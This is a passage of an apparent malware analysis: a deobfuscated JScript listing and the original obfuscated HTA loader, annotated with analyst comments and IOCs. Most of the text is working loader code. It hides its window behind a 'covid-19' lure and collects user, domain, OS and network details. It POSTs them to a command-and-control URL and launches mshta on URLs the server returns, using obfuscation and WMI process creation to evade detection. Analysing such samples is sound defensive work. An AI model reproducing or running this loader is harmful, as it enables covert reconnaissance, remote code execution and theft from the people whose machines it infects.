while (true) { | |
if (mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)).Size > 0) { | |
if (mainFuncStruct.funcStruct4.chcp() == "936" || certutil) { | |
var newout = "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".l" + "og"; | |
mainFuncStruct.funcStruct3.shellRunCommand("certut" + "il -encode " + mainFuncStruct.funcStruct2.expandEnvStrings(path) + " " + newout); | |
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess(newout); | |
mainFuncStruct.funcStruct2.shellDeleteFile(newout); | |
} else { | |
var fp = mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)); | |
var fd = fp.OpenAsTextStream(); | |
var data = fd.read(fp.Size); | |
fd.close(); | |
} | |
return data; | |
} else { | |
loopcount += 1; | |
if (loopcount > 180) { | |
return ""; | |
} | |
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false); | |
} | |
} | |
} | |
// Force-delete a scratch file (KOTINHYPQW); the `true` clears read-only.
// Throws if the file is missing — callers do not guard this.
mainFuncStruct.funcStruct2.shellDeleteFile = function(path) { | |
mainFuncStruct.fileObj.DeleteFile(mainFuncStruct.funcStruct2.expandEnvStrings(path), true); | |
}; | |
// Entry point. emptyIfFirstRun is "" in this sample, so the first-run branch
// always executes:
//   1. (HTA only) set HKCU\SOFTWARE\Microsoft\Internet Explorer\Styles\
//      MaxScriptStatements = 0xFFFFFFFF, which raises the threshold for IE's
//      "a script on this page is causing ... to run slowly" prompt so the
//      long polling loops never trigger it;
//   2. POST the recon string to the C2;
//   3. spawn `mshta <beacon URL>` (a fresh copy of the loader / next stage);
//   4. terminate this instance.
// The else branch (polling loops) is dead here; presumably the C2 serves a
// build with emptyIfFirstRun == "prfx" to the respawned mshta — not visible
// in this sample. Any exception is reported to the C2 via the error headers.
// NOTE(review): because of the funcStruct6 name collision introduced by the
// deobfuscation, sendDataToCNC/runMshtaFromCNC/sendErrorDataToCNC are not
// defined at this point in THIS listing; they are in the original.
try { | |
if (mainFuncStruct.emptyIfFirstRun != "prfx") { | |
if (mainFuncStruct.isRunningInMshta()) { | |
var path = "SOFT" + "WARE\\Mi" + "crosoft\\I" + "nternet Explor" + "er\\St" + "yles"; | |
var key = "Ma" + "xScriptStat" + "ements"; | |
mainFuncStruct.funcStruct5.setRegistryValue(mainFuncStruct.funcStruct5.HKCU, path, key, 0xFFFFFFFF, mainFuncStruct.funcStruct5.REG_DWORD); | |
} | |
mainFuncStruct.funcStruct6.sendDataToCNC(mainFuncStruct.funcStruct4.getComputerInfo()); | |
try { | |
mainFuncStruct.funcStruct6.runMshtaFromCNC(""); | |
} catch (e) { | |
mainFuncStruct.funcStruct6.sendErrorDataToCNC(e) | |
} | |
mainFuncStruct.killSelf(); | |
} else { | |
if (mainFuncStruct.isRunningInMshta()) | |
LimitedRunLoop(); | |
else | |
InfiniteRunLoop(); | |
} | |
} catch (e) { | |
mainFuncStruct.funcStruct6.sendErrorDataToCNC(e); | |
} | |
// One C2 poll. Returns 1 to keep polling, 0 to stop.
//  * Kill-date check against highNumber (epoch ms; effectively never).
//  * Beacon with the default job key; on HTTP 200/201/202 with a non-empty
//    body the body IS the job key and `mshta <beacon URL + jobkey>` is
//    spawned — 202 selects the 32-bit mshta. An empty body is a no-op poll.
//  * Any other status, or any exception (network error, C2 down), stops.
// There is no sleep here; the callers loop immediately, so a live C2 is
// polled continuously.
function CanHelp() { | |
var epoch = new Date().getTime(); | |
// parseInt without radix; the string is decimal so this is 999999999999999.
var expire = parseInt(mainFuncStruct.highNumber); | |
if (epoch > expire) { | |
return 0; | |
} | |
try { | |
var work = mainFuncStruct.funcStruct6.sendHTTPRequestEmpty(); | |
if (work.status == 201 || work.status == 202 || work.status == 200) { | |
if (work.responseText.length > 0) { | |
var jobkey = work.responseText; | |
mainFuncStruct.funcStruct6.runMshtaFromCNC(jobkey, work.status == 202); | |
} | |
} else { | |
return 0; | |
} | |
} catch (e) { | |
return 0; | |
} | |
return 1; | |
} | |
// wscript/cscript mode (CanHelpLoop in the original): poll the C2 back-to-
// back until CanHelp returns 0, then terminate. No delay between requests.
// `an` is unused.
function InfiniteRunLoop() { | |
var an = "undefined"; | |
while (CanHelp()); | |
mainFuncStruct.killSelf(); | |
} | |
// HTA mode (CanHelpTimeout in the original): poll at most 10 times
// ((1 - 1) .. (5 * 5 - 15)), terminating early if CanHelp returns 0. After
// 10 polls it always respawns `mshta <beacon URL>` and exits — `sn` is the
// literal string "undefined", so the guard is always true. Net effect: each
// mshta instance is short-lived and hands over to a fresh one, presumably to
// limit per-process lifetime/memory — confirm intent against the C2 side.
function LimitedRunLoop() { | |
var sn = "undefined"; | |
for (var i = (1 - 1); i < (5 * 5 - 15); ++i) { | |
if (!CanHelp()) { | |
mainFuncStruct.killSelf(); | |
return; | |
} | |
} | |
if (sn == "undefined") { | |
mainFuncStruct.funcStruct6.runMshtaFromCNC(""); | |
mainFuncStruct.killSelf(); | |
} | |
} |
<html> | |
<!--
  MALWARE SAMPLE — original obfuscated HTA (mshta) loader; the deobfuscated
  listing above is this same script with identifiers renamed. Do NOT open
  with mshta.exe. The <hta:application> line minimises the window, hides it
  from the taskbar and disables navigation; the script then moves it
  off-screen and silences script errors. The body text "covid-19" is the only
  visible lure. Obfuscated -> deobfuscated name map: USZOOYWIZS=mainFuncStruct,
  rsS=reverseString, FSZGCSETMH=funcStruct4 (recon), JLOOXOZDZT=C2 helpers,
  KTFJHNZIRI=funcStruct7 (HTTP), ERDXQCZMRN=funcStruct1 (processes),
  XDGAVBPIRF=funcStruct5 (registry), CMXWOMTDOO=WMI process creation,
  PUZLNFITWY=funcStruct3 (shell), WXUXMBSDFO=funcStruct2 (files),
  CanHelpLoop=InfiniteRunLoop, CanHelpTimeout=LimitedRunLoop.
-->
<head> | |
<hta:application caption="no" windowState="minimize" showInTaskBar="no" scroll="no" navigable="no" /> | |
<script language="JScript"> | |
// Hide the window (off-screen, 10x15 px, re-blur on focus) and swallow
// script errors so mshta never shows a dialog.
window.moveTo(-105,300);window.blur();window.resizeTo(10,15);try | |
{window.onerror=function(sMsg,sUrl,sLine){return false;} | |
window.onfocus=function(){window.blur();}} | |
catch(e){} | |
// Root object + rsS string reverser. ProgIDs are built from reversed fragments
// (rsS("bOmetsySeliF.gnit") = "ting.FileSystemOb", rsS("lleh") = "hell") so
// "Scripting.FileSystemObject" / "WScript.Shell" never appear literally.
// The same line carries the C2 config: PALBTPZSUF (unused base URL),
// BZZUUCGDQU (token, redacted), TNHTOGCTIG ("" = first run marker, compared
// with "prfx"), JPOWZJFUNB (beacon URL http://crt.officecloud.top/st?
// vsxceymxlslzeqx=<token>), HIJJAGKENR (kill date in epoch ms, never reached),
// and GGIAVPXSTH (delayed call; busy-waits outside an HTA; never called).
var USZOOYWIZS={};function rsS(s){return s.split("").reverse().join("");} | |
USZOOYWIZS.BZIYSEPGNF=new ActiveXObject("Scrip"+rsS("bOmetsySeliF.gnit")+"ject");USZOOYWIZS.VYAUWFCEQB=new ActiveXObject("WScrip"+"t.S"+rsS("lleh"));USZOOYWIZS.PALBTPZSUF="http://crt.officecloud.top/st";USZOOYWIZS.BZZUUCGDQU="REDACTED";USZOOYWIZS.TNHTOGCTIG="";USZOOYWIZS.JPOWZJFUNB="http://crt.officecloud.top/st?vsxceymxlslzeqx=REDACTED";USZOOYWIZS.HIJJAGKENR="999999999999999";USZOOYWIZS.GGIAVPXSTH=function(ms,callback) | |
{if(USZOOYWIZS.DYPJQVFPFC()) | |
{window.setTimeout(callback,ms);} | |
else | |
{var now=new Date().getTime();while(new Date().getTime()<now+ms);callback();}} | |
// IQSPUIAMOB = killSelf: every window.close() variant, then WScript.quit,
// then WMI-terminate the PID that LLXQUFFVDG reports as "own".
USZOOYWIZS.IQSPUIAMOB=function() | |
{if(USZOOYWIZS.DYPJQVFPFC()) | |
{try{window["close"]();}catch(e){} | |
try{window.self["close"]();}catch(e){} | |
try{window.top["close"]();}catch(e){} | |
try{self["close"]();}catch(e){} | |
try | |
{window.open('','_self','');window["close"]();} | |
catch(e) | |
{}} | |
try | |
{WScript.quit();} | |
catch(e) | |
{} | |
try | |
{var pid=USZOOYWIZS.ERDXQCZMRN.LLXQUFFVDG();USZOOYWIZS.ERDXQCZMRN.IVRPZFVXMC(pid);} | |
catch(e) | |
{}} | |
// DYPJQVFPFC = isRunningInMshta (true for any host with a `window` global);
// XTERINGOBR = checkIfWscriptDefined (unused). rsS("denifednu") = "undefined".
USZOOYWIZS.DYPJQVFPFC=function() | |
{return typeof(window)!==rsS("denifednu");} | |
USZOOYWIZS.XTERINGOBR=function() | |
{return typeof(WScript)!==rsS("denifednu");} | |
// SFULCEKQPJ = maybeGenGUID: Math.random-based GUID-shaped name for
// %TEMP%\*.log scratch files; not a real GUID.
USZOOYWIZS.SFULCEKQPJ=function() | |
{try | |
{function s4() | |
{return Math.floor((1+Math.random())*0x1235612).toString(16).substring(1);} | |
return s4()+s4()+'-'+s4()+s4()+'-'+s4()+'-'+ | |
s4()+'-'+s4()+s4()+s4();} | |
catch(e) | |
{}} | |
// FSZGCSETMH = funcStruct4: host reconnaissance.
// JPWKKYVEDQ = getSessions: admin check via `net1 session || echo ofailur`
// (net session fails unless elevated; missing marker => admin).
USZOOYWIZS.FSZGCSETMH={};USZOOYWIZS.FSZGCSETMH.JPWKKYVEDQ=function() | |
{try | |
{var res=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("(net1 session || echo ofailur)","%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".log");if(res.indexOf("ofailur")==-1) | |
{return true;} | |
return false;} | |
catch(e) | |
{return false;}} | |
// MKBDEIYCYP = readOsVersion: ProductName + "triplestar" + CurrentBuildNumber.
USZOOYWIZS.FSZGCSETMH.MKBDEIYCYP=function() | |
{try | |
{var osver=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");var osbuild=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber");return osver+"triplestar"+osbuild;} | |
catch(e){} | |
return"Unknown";} | |
// CSZTZBQMQU = getDCName: cached Group Policy DCName (domain-joined hosts).
USZOOYWIZS.FSZGCSETMH.CSZTZBQMQU=function() | |
{try | |
{var DC=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName");if(DC.length>0) | |
{return DC;}} | |
catch(e) | |
{} | |
return"Unknown";} | |
// GTTECATTBE = getArch: system PROCESSOR_ARCHITECTURE from the registry.
USZOOYWIZS.FSZGCSETMH.GTTECATTBE=function() | |
{try | |
{var arch=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE");return arch;} | |
catch(e){} | |
return"Unknown";} | |
// AYRFPFYDFU = cdToTempFolder: output of `cd`, captured in the FIXED file
// %TEMP%\truew.tmp (IOC).
USZOOYWIZS.FSZGCSETMH.AYRFPFYDFU=function() | |
{try | |
{var truew=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("cd","%TEMP%\\truew.tmp");return truew;} | |
catch(e) | |
{} | |
return"";} | |
// PPYJMBWCSC = getRoutingInfo: interface address (4th field) of the
// `route PRINT -4` default-route line (two "0.0.0.0" fields).
USZOOYWIZS.FSZGCSETMH.PPYJMBWCSC=function() | |
{try | |
{var routeprint4=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("route PRINT -4","%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".log");var res=routeprint4.split("\r\n");for(var i=0;i<res.length;i++) | |
{line=res[i].split(" ");zerocount=0;itemcount=0;correctflag=false;for(var j=0;j<line.length;j++) | |
{if(line[j]) | |
{itemcount+=1;if(itemcount==4&&correctflag){return line[j];}} | |
if(line[j]=="0.0.0.0") | |
{zerocount+=1;if(zerocount==2) | |
{correctflag=true;}}}}} | |
catch(e) | |
{} | |
return"";} | |
// IAPTOFSEZA = getComputerInfo: assembles the first-run beacon body,
// fields joined by the literal " n0body i know " (IOC); "*" after the
// username marks an elevated process.
USZOOYWIZS.FSZGCSETMH.IAPTOFSEZA=function() | |
{var net=new ActiveXObject("WScript.Network");var domain="";if(net.UserDomain.length!=0) | |
{domain=net.UserDomain;} | |
else | |
{try{domain=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("echo %userdomain%","%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".log");}catch(h){}finally{domain=domain.split(" \r\n")[0];}} | |
var info=domain+"\\"+net.Username;if(USZOOYWIZS.FSZGCSETMH.JPWKKYVEDQ()) | |
info+="*";info+=" n0body i know "+net.ComputerName;info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.MKBDEIYCYP();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.CSZTZBQMQU();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.GTTECATTBE();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.AYRFPFYDFU();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.PPYJMBWCSC();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.RLUXESGUDE();return info;} | |
// EVOWWBMQYM = chcp and RLUXESGUDE = getSomeCodePageNum: both hard-coded
// "1252", so the "936" (GBK) branches elsewhere are dead in this build.
USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM=function() | |
{try | |
{return"1252"} | |
catch(e) | |
{return"1252";}} | |
USZOOYWIZS.FSZGCSETMH.RLUXESGUDE=function() | |
{try | |
{return"1252"} | |
catch(e) | |
{return"437";}} | |
// JLOOXOZDZT = C2 helpers (labelled funcStruct6 in the deobfuscated listing,
// where it collides with CMXWOMTDOO; here they are distinct objects).
// FEQUSOEKAK = sendDataToCNC (POST to beacon URL);
// ENNXSOYMMH = sendErrorDataToCNC (error number/name/description in the
//   errno/errname/errdesc request headers);
// KPUKINKNPO = getCncWithJobURL (beacon URL + jobkey + "&");
// KEYOMPGODE = sendHTTPRequestEmpty (empty POST used as the job poll);
// MMTQDJLVYX = runMshtaFromCNC (`mshta <URL>`; SysWOW64 prefix when
//   fork32Bit; WMI Win32_Process.Create, fallback WScript.Shell.Run hidden).
USZOOYWIZS.JLOOXOZDZT={};USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK=function(data,headers) | |
{return USZOOYWIZS.KTFJHNZIRI.JHFPHAPALS(USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO(),data,headers);} | |
USZOOYWIZS.JLOOXOZDZT.ENNXSOYMMH=function(e) | |
{try | |
{var headers={};headers["errno"]=(e.number)?e.number:"-1";headers["errname"]=(e.name)?e.name:"Unknown";headers["errdesc"]=(e.description)?e.description:"Unknown";return USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK(e.message,headers);} | |
catch(e) | |
{}} | |
USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO=function(jobkey) | |
{var jobkey=(typeof(jobkey)!=="undefined")?jobkey:USZOOYWIZS.TNHTOGCTIG;return USZOOYWIZS.JPOWZJFUNB+jobkey+"&";} | |
USZOOYWIZS.JLOOXOZDZT.KEYOMPGODE=function() | |
{var url=USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO();return USZOOYWIZS.KTFJHNZIRI.JHFPHAPALS(url);} | |
USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX=function(jobkey,fork32Bit) | |
{var fork32Bit=(typeof(fork32Bit)!=="undefined")?fork32Bit:false;var cmd="mshta stelsy";if(fork32Bit) | |
cmd=USZOOYWIZS.WXUXMBSDFO.KKJQGQQLNJ()+cmd;cmd=cmd.replace("stelsy",USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO(jobkey));try{USZOOYWIZS.CMXWOMTDOO.UUNAMVWTME(cmd);}catch(e){USZOOYWIZS.VYAUWFCEQB.Run(cmd,0,false);}} | |
// KTFJHNZIRI = funcStruct7: HTTP transport.
// PQXJNPIPNZ = getHttpRequestObj: rsS("HLMXrevreS.2lmxsM") = "Msxml2.ServerXMLH"
//   (+"TTP.6.0"), timeouts 0 (~~[] === 0); fallback rsS("eRpttHniW.pttHniW")
//   = "WinHttp.WinHttpRe" (+"quest.5.1") with 30 s (0x7530) timeouts.
// PQXCRNIAHD = setRequestHTTPHeaders: adds "Content-Type: application/json"
//   when absent; rsS("Rtes")+"eque"+rsS("Hts")+"eader" = setRequestHeader.
// JHFPHAPALS = sendHTTPRequest: synchronous POST.
// KEYOMPGODE (transport) = synchronous GET; rsS("po")+"en" = open,
//   rsS("es")+"nd" = send. Not called in this file.
USZOOYWIZS.KTFJHNZIRI={};USZOOYWIZS.KTFJHNZIRI.PQXJNPIPNZ=function() | |
{var http=null;try | |
{http=new ActiveXObject(rsS("HLMXrevreS.2lmxsM")+"TTP.6.0");http.setTimeouts(~~[],~~[],~~[],~~[]);} | |
catch(e) | |
{http=new ActiveXObject(rsS("eRpttHniW.pttHniW")+"quest.5.1");http.setTimeouts(0x7530,0x7530,0x7530,~~[]);} | |
return http;} | |
USZOOYWIZS.KTFJHNZIRI.PQXCRNIAHD=function(http,headers) | |
{var headers=(typeof(headers)!=="undefined")?headers:{};var content=false;for(var key in headers) | |
{try{var value=headers[key];http.setRequestHeader(key,value);}catch(h){}finally{if(key.toUpperCase()=="CONTENT-TYPE") | |
content=true;}} | |
if(!content) | |
http[rsS("Rtes")+"eque"+rsS("Hts")+"eader"]("Content-Type","application/json");} | |
USZOOYWIZS.KTFJHNZIRI.JHFPHAPALS=function(url,data,headers) | |
{var data=(typeof(data)!=="undefined")?data:"";var http=USZOOYWIZS.KTFJHNZIRI.PQXJNPIPNZ();http.open("POST",url,false);USZOOYWIZS.KTFJHNZIRI.PQXCRNIAHD(http,headers);http.send(data);return http;} | |
USZOOYWIZS.KTFJHNZIRI.KEYOMPGODE=function(url,headers) | |
{var http=USZOOYWIZS.KTFJHNZIRI.PQXJNPIPNZ();http[rsS("po")+"en"]("GET",url,false);USZOOYWIZS.KTFJHNZIRI.PQXCRNIAHD(http,headers);http[rsS("es")+"nd"]();return http;} | |
// ERDXQCZMRN = funcStruct1: process handling via WMI Win32_Process.
// LLXQUFFVDG = getOwnPID: spawns `%comspec% /K hostname` through
//   UUNAMVWTME, finds it in the process list, returns its ParentProcessId
//   and terminates it. NOTE(review): the WMI-created child is presumably
//   parented by the WMI provider host, so the returned PID may not be this
//   script's — confirm on a live system.
// IVRPZFVXMC = terminateProcessByPID; ZYGNWLRIBN = getProcessList.
USZOOYWIZS.ERDXQCZMRN={};USZOOYWIZS.ERDXQCZMRN.LLXQUFFVDG=function() | |
{var cmd=USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW("%comspec% /K hostname");var childPid=USZOOYWIZS.CMXWOMTDOO.UUNAMVWTME(cmd);var pid=-1;var latestTime=0;var latestProc=null;var processes=USZOOYWIZS.ERDXQCZMRN.ZYGNWLRIBN();var items=new Enumerator(processes);while(!items.atEnd()) | |
{var proc=items.item();try | |
{if(proc.ProcessId==childPid) | |
{latestProc=proc;break;}}catch(e) | |
{} | |
items.moveNext();} | |
pid=latestProc.ParentProcessId;latestProc.Terminate();return pid;} | |
USZOOYWIZS.ERDXQCZMRN.IVRPZFVXMC=function(pid) | |
{var processes=USZOOYWIZS.ERDXQCZMRN.ZYGNWLRIBN();var items=new Enumerator(processes);while(!items.atEnd()) | |
{var proc=items.item();try | |
{if(proc.ProcessId==pid) | |
{proc.Terminate();return true;}}catch(e) | |
{} | |
items.moveNext();} | |
return false;} | |
USZOOYWIZS.ERDXQCZMRN.ZYGNWLRIBN=function() | |
{var wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");var query="Select * From Win32_Process";return wmi.ExecQuery(query);} | |
// XDGAVBPIRF = funcStruct5: StdRegProv registry writes. ZNGQDUNJPL/RZJJYUNYBI/
// JLKBWUKRUQ = HKCR/HKCU/HKLM; RGYFSUKIII/PRZCWOLURK/RWWWGIWTOM/NTOSBUVLVG =
// internal STRING/BINARY/DWORD/QWORD selectors (not Win32 REG_* values);
// XONKHXSJHM = getWmiRegistryObject (remote `computer` supported, never used);
// VIUNPHBKRR = setRegistryValue (CreateKey + Set*Value, return codes ignored).
USZOOYWIZS.XDGAVBPIRF={};USZOOYWIZS.XDGAVBPIRF.ZNGQDUNJPL=0x80000000;USZOOYWIZS.XDGAVBPIRF.RZJJYUNYBI=0x80000001;USZOOYWIZS.XDGAVBPIRF.JLKBWUKRUQ=0x80000002;USZOOYWIZS.XDGAVBPIRF.RGYFSUKIII=0;USZOOYWIZS.XDGAVBPIRF.PRZCWOLURK=1;USZOOYWIZS.XDGAVBPIRF.RWWWGIWTOM=2;USZOOYWIZS.XDGAVBPIRF.NTOSBUVLVG=3;USZOOYWIZS.XDGAVBPIRF.XONKHXSJHM=function(computer) | |
{var computer=(typeof(computer)!=="undefined")?computer:".";var reg=GetObject("winmgmts:\\\\"+computer+"\\root\\default:StdRegProv");return reg;} | |
USZOOYWIZS.XDGAVBPIRF.VIUNPHBKRR=function(hKey,path,key,value,valType,computer) | |
{var reg=USZOOYWIZS.XDGAVBPIRF.XONKHXSJHM(computer);reg.CreateKey(hKey,path);if(valType==USZOOYWIZS.XDGAVBPIRF.RGYFSUKIII) | |
reg.SetStringValue(hKey,path,key,value);else if(valType==USZOOYWIZS.XDGAVBPIRF.RWWWGIWTOM) | |
reg.SetDWORDValue(hKey,path,key,value);else if(valType==USZOOYWIZS.XDGAVBPIRF.NTOSBUVLVG) | |
reg.SetQWORDValue(hKey,path,key,value);else if(valType==USZOOYWIZS.XDGAVBPIRF.PRZCWOLURK) | |
reg.SetBinaryValue(hKey,path,key,value);} | |
// CMXWOMTDOO.UUNAMVWTME = createProcessReturnPID: Win32_Process.Create with
// a hidden 1x1 window and CreateFlags 16777216 = 0x01000000
// (CREATE_BREAKAWAY_FROM_JOB); returns the new PID. This is a separate
// object from JLOOXOZDZT even though the deobfuscated listing names both
// funcStruct6.
USZOOYWIZS.CMXWOMTDOO={};USZOOYWIZS.CMXWOMTDOO.UUNAMVWTME=function(cmd) | |
{var SW_HIDE=0;var pid=0;var wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2") | |
var si=wmi.Get("Win32_ProcessStartup").SpawnInstance_();si.ShowWindow=SW_HIDE;si.CreateFlags=16777216;si.X=si.Y=si.XSize=si.ySize=1;var w32proc=wmi.Get("Win32_Process");var method=w32proc.Methods_.Item("Create");var inParams=method.InParameters.SpawnInstance_();inParams.CommandLine=cmd;inParams.CurrentDirectory=null;inParams.ProcessStartupInformation=si;var outParams=w32proc.ExecMethod_("Create",inParams);return outParams.ProcessId;} | |
// PUZLNFITWY = funcStruct3: shell execution.
// GXJDCREARQ = runCmdToFile: `cmd /c %c^oms^pec%^ /q /c chcp 1252 & <cmd>
//   1> <file> 2>&1`, hidden and waited on; the caret-split "comspec" is an
//   evasion (IOC on the command line). Output read back via JOUFZBIORZ
//   (only when EVOWWBMQYM()=="936", never here) or KPPKUQVGHI, then deleted.
// DLWSGBGTRP = shellRunCommand: builds the same wrapper into `c` but runs the
//   raw `cmd` (the wrapper is dead code); window 0 = hidden; waits when
//   fork is false (used with `ping 127.0.0.1 -n 2` as a sleep).
USZOOYWIZS.PUZLNFITWY={};USZOOYWIZS.PUZLNFITWY.GXJDCREARQ=function(cmd,stdOutPath) | |
{cmd="chcp "+USZOOYWIZS.FSZGCSETMH.RLUXESGUDE()+" & "+cmd;var c="cmd /c %c^oms^pec%^ /q /c "+cmd+" 1> "+USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(stdOutPath);c+=" 2>&1";USZOOYWIZS.VYAUWFCEQB.Run(c,0,true);if(USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM()=="936") | |
{var data=USZOOYWIZS.WXUXMBSDFO.JOUFZBIORZ(stdOutPath);} | |
else | |
{var data=USZOOYWIZS.WXUXMBSDFO.KPPKUQVGHI(stdOutPath);} | |
USZOOYWIZS.WXUXMBSDFO.KOTINHYPQW(stdOutPath);return data;} | |
USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP=function(cmd,fork) | |
{var fork=(typeof(fork)!==rsS("denifednu"))?fork:true;var c="cmd /c %c^oms^pe^c% /q /c "+cmd;USZOOYWIZS.VYAUWFCEQB.Run(cmd,5-5,!fork);} | |
// WXUXMBSDFO = funcStruct2: file helpers.
// QUMMKJWDNW = expandEnvStrings; KKJQGQQLNJ = getSystemFolder (SysWOW64\ if
//   present, else System32\ — selects 32-bit mshta);
// JOUFZBIORZ = readFileUntilSuccess: poll until the file exists and is
//   non-empty, ReadAll(); ~180 x 1 s before giving up with "", but a failing
//   read retries forever;
// KPPKUQVGHI = readFileUntilSuccess2: optional "Status: NotExist" beacon
//   (rsS("sut"+"atS") = "Status") and optional `certutil -encode` (LOLBin)
//   base64 path; otherwise OpenAsTextStream().read(Size);
// KOTINHYPQW = shellDeleteFile (force delete).
USZOOYWIZS.WXUXMBSDFO={};USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW=function(path) | |
{return USZOOYWIZS.VYAUWFCEQB.ExpandEnvironmentStrings(path);} | |
USZOOYWIZS.WXUXMBSDFO.KKJQGQQLNJ=function() | |
{var base=USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW("%WINDIR%");var syswow64=base+"\\SysWOW64\\";if(USZOOYWIZS.BZIYSEPGNF.FolderExists(syswow64)) | |
return syswow64;return base+"\\System32\\";} | |
USZOOYWIZS.WXUXMBSDFO.JOUFZBIORZ=function(path) | |
{var loopcount=0;while(true) | |
{if(USZOOYWIZS.BZIYSEPGNF.FileExists(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path))&&USZOOYWIZS.BZIYSEPGNF.GetFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path)).Size>0) | |
{try | |
{var fd=USZOOYWIZS.BZIYSEPGNF.OpenTextFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path),1,false,0);var data=fd.ReadAll();fd.Close();return data;} | |
catch(e) | |
{USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("ping 127."+"0.0.1 -n 2",false);continue;}} | |
else | |
{loopcount+=1;if(loopcount>180) | |
{return"";} | |
USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("ping 127."+"0.0.1 -n 2",false);}}} | |
USZOOYWIZS.WXUXMBSDFO.KPPKUQVGHI=function(path,exists,certutil) | |
{var exists=(typeof(exists)!==rsS("denifednu"))?exists:false;var certutil=(typeof(certutil)!==rsS("denifednu"))?certutil:false;if(!USZOOYWIZS.BZIYSEPGNF.FileExists(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path))&&exists) | |
{var headers={};headers[rsS("sut"+"atS")]="Not"+"Exist";USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK("",headers);return"";} | |
var loopcount=0;while(true) | |
{if(USZOOYWIZS.BZIYSEPGNF.FileExists(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path))&&USZOOYWIZS.BZIYSEPGNF.GetFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path)).Size>0) | |
{if(USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM()=="936"||certutil) | |
{var newout="%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".l"+"og";USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("certut"+"il -encode "+USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path)+" "+newout);var data=USZOOYWIZS.WXUXMBSDFO.JOUFZBIORZ(newout);USZOOYWIZS.WXUXMBSDFO.KOTINHYPQW(newout);} | |
else | |
{var fp=USZOOYWIZS.BZIYSEPGNF.GetFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path));var fd=fp.OpenAsTextStream();var data=fd.read(fp.Size);fd.close();} | |
return data;} | |
else | |
{loopcount+=1;if(loopcount>180) | |
{return"";} | |
USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("ping 127."+"0.0.1 -n 2",false);}}} | |
// Entry point starts on the `try` at the end of the next line. TNHTOGCTIG is
// "", so the first-run branch always runs: set HKCU\SOFTWARE\Microsoft\
// Internet Explorer\Styles\MaxScriptStatements = 0xFFFFFFFF (suppresses IE's
// slow-script prompt), POST the recon string, spawn `mshta <beacon URL>`,
// then IQSPUIAMOB (self-kill). The CanHelpTimeout/CanHelpLoop polling branch
// is dead in this sample; presumably served with TNHTOGCTIG="prfx" later.
USZOOYWIZS.WXUXMBSDFO.KOTINHYPQW=function(path) | |
{USZOOYWIZS.BZIYSEPGNF.DeleteFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path),true);};try | |
{if(USZOOYWIZS.TNHTOGCTIG!="prfx") | |
{if(USZOOYWIZS.DYPJQVFPFC()) | |
{var path="SOFT"+"WARE\\Mi"+"crosoft\\I"+"nternet Explor"+"er\\St"+"yles";var key="Ma"+"xScriptStat"+"ements";USZOOYWIZS.XDGAVBPIRF.VIUNPHBKRR(USZOOYWIZS.XDGAVBPIRF.RZJJYUNYBI,path,key,0xFFFFFFFF,USZOOYWIZS.XDGAVBPIRF.RWWWGIWTOM);} | |
